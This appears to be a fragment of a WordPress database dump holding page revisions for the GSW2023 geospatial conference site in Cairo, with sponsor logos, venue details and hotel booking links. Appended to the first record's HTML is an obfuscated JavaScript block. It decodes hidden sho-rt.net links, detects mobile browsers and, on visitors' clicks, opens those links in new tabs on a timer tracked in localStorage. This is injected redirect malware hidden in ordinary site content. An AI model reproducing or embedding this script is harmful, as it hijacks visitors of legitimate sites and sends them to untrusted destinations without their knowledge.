href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-11 13:16:35','2023-07-11 13:16:35','',3066,'https://gsw2023.com/?p=5008',0,'revision','',0),
(5009,1,'2023-07-11 13:23:19','2023-07-11 13:23:19','','ntra','','inherit','open','closed','','ntra','','','2023-07-11 13:23:19','2023-07-11 13:23:19','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/ntra.jpg',0,'attachment','image/jpeg',0),
(5010,1,'2023-07-11 13:26:27','2023-07-11 13:26:27','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" 